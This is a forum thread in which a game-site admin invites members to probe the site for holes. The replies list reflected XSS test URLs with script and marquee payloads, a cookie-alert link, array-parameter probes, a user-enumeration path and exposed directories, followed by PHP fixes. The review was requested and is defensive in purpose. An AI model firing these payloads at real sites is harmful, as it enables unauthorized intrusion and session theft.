
Hello all experts, I am a new member here, and on my first day I found this forum very interesting and knowledgeable. If you all can test this site of mine for any vulnerabilities, I would be thankful to all of PHPFreaks. www.themafiaman.com is an online MMORPG game; it is a premade script, and our hosting provider's team does additional modifications for the game. Please check my site and report to me. And one request: if you find any hole in it, please do not do something bad; we are all here to help each other. If I am able to provide any kind of help to PHP Freaks or any member, I surely will.

 

Thanks

Regards The Mafia Man Admin

 


First hole is in the register on step three: if you put ">code as your last name and hit enter, it runs.

 

http://www.themafiaman.com/signup.php?step=4&email=%22%3E%3Cmarquee%3Elolz&referer=

 

http://www.themafiaman.com/signup.php?step=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&email=lolwtf@aol.com&referer=

 

http://themafiaman.com/signup.php?step=3&refer=%22%3E%3Cmarquee%3Elolz

 

http://themafiaman.com/tru/board.php?tru=10&action=post

xss in message... and I can make it link to say <a href="javascript:alert(document.cookie)">CLICK HERE</a>

http://www.themafiaman.com/tru/board.php?brd=recruit&tru=10

 

http://www.themafiaman.com/tru/pimp.php?tru=10

 

both xssable

 

 

I can't finish cause some stupid fuck face disabled my account.

 

Anyway this is the LAST time you will see me make a post on these forums. I do not believe you should help admins fix security holes anymore. Open-source/full disclosure is bad. I discourage everyone from doing it.

 

Agentsteal I hope you read this... Don't waste your time with this helping people fix security anymore. It's a complete waste of time.

 

 

lolz

Mate, thanks for your support and for checking my site. Actually one of our moderators didn't know about the testing, so he found you suspicious and banned you. Please complete your test; I am making your account normal.

My staff and I are sorry for what happened to you.

Thanks

Regards

Array:

http://www.themafiaman.com/confirm.php?referer[]

 

Array:

http://www.themafiaman.com/signup.php?step[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&age[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&cpassword[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&email[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&first[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&last[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&messager_id[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&password[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&refer[]

 

Array:

http://www.themafiaman.com/signup.php?step=3&username[]

 

Array:

http://www.themafiaman.com/signup.php?step=4&email[]

 

Array:

http://www.themafiaman.com/signup.php?step=4&referer[]

 

Cross Site Scripting:

http://www.themafiaman.com/confirm.php?referer="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&age="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&cpassword="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&email="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&first="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&last="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&messager_id="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&password="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&refer="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=3&username="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=4&email=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.themafiaman.com/signup.php?step=4&referer="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/confirm.php if the email address contains code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/resend.php if the email address contains code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/support.php if the To field contains code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Your Name field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Name field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Email field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Refferal Link field contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://www.themafiaman.com/winners.php if the drop down menus contain code.

 

Cross Site Scripting:

There is Cross Site Scripting if you submit a directory search that contains code.

 

Cross Site Scripting:

There is Cross Site Scripting if you submit a family search that contains code.

 

Drop Down Menu:

If you edit the drop down menu on http://www.themafiaman.com/winners.php you can submit arbitrary values.

 

Drop Down Menu:

If you edit the round drop down menu on http://www.themafiaman.com/credits.php you can submit arbitrary values.

 

Maximum Length:

If you edit the fields you can remove the maximum lengths.

 

User Enumeration:

http://www.themafiaman.com/~root

Also this probably should only be accessible if you've logged in:

  http://themafiaman.com/cgi-sys/mchat.cgi?channel=themafiaman.com

 

I got that from this page which should be blocked:

  http://themafiaman.com/chat

 

Not such a problem, but you might hide this directory:

  http://themafiaman.com/include/

 

That's all for now.

For hiding the contents of a directory, either disable directory listing on the server, or have an index.php in each directory with

 <?php header("Location: http://www.themafiaman.com"); exit(0); ?> 

 

Cross site scripting (XSS) can be fixed by validating ALL user input. See this article:

  http://www.htmlcenter.com/tutorials/tutorials.cfm/149/PHP/

Basically you just want to restrict as much as possible what input a user can give.

 

For Array errors, just add a line

 <?php if (is_array($var)) { $var = $var[0]; } // $var stands for each request variable ?> 

 

That should fix most of your troubles.
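
The fixes suggested in the reply above, combined into one input-handling example (added here, not code from the thread or from the game's script; the helper names, the allowed step and round values, and the sample input are assumptions):

```php
<?php
// Added example. request_string() and esc() are hypothetical helpers; the
// allowed step/round values and the sample $query are assumptions.

// Read one request parameter as a bounded string. Array input such as
// ?step[]= is rejected instead of being echoed back as "Array".
function request_string(array $src, string $key, int $maxLen, string $default = ''): string
{
    $v = $src[$key] ?? $default;
    if (!is_string($v)) {
        return $default;
    }
    return substr(trim($v), 0, $maxLen); // length cap enforced server-side
}

// Encode a value for HTML text or a quoted attribute.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Constructed sample input using parameter names reported in the thread.
$query = [
    'step'  => ['x'],
    'email' => '"><marquee>lolz',
    'refer' => '"><marquee><h1>vulnerable</marquee>',
    'round' => '999',
];

// Whitelist validation: anything outside the expected set falls back to a default.
$step = (int) request_string($query, 'step', 1, '1');
if (!in_array($step, [1, 2, 3, 4], true)) {
    $step = 1;
}
$round = request_string($query, 'round', 3, '1');
if (!in_array($round, ['1', '2', '3'], true)) {
    $round = '1'; // drop-down values are re-checked, never trusted
}

// Format validation for the e-mail address; invalid input is discarded.
$email = filter_var(request_string($query, 'email', 254), FILTER_VALIDATE_EMAIL) ?: '';
$refer = request_string($query, 'refer', 64);

// Output encoding: free-text values are escaped wherever they are printed.
printf("<input type=\"hidden\" name=\"step\" value=\"%d\">\n", $step);
printf("<input type=\"text\" name=\"email\" value=\"%s\">\n", esc($email));
printf("<input type=\"hidden\" name=\"refer\" value=\"%s\">\n", esc($refer));
printf("<option value=\"%s\" selected>Round %s</option>\n", esc($round), esc($round));
```

The maximum-length and drop-down findings are covered by the same pattern: limits and allowed values set in the HTML form are only hints, so the server repeats both checks on every request.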
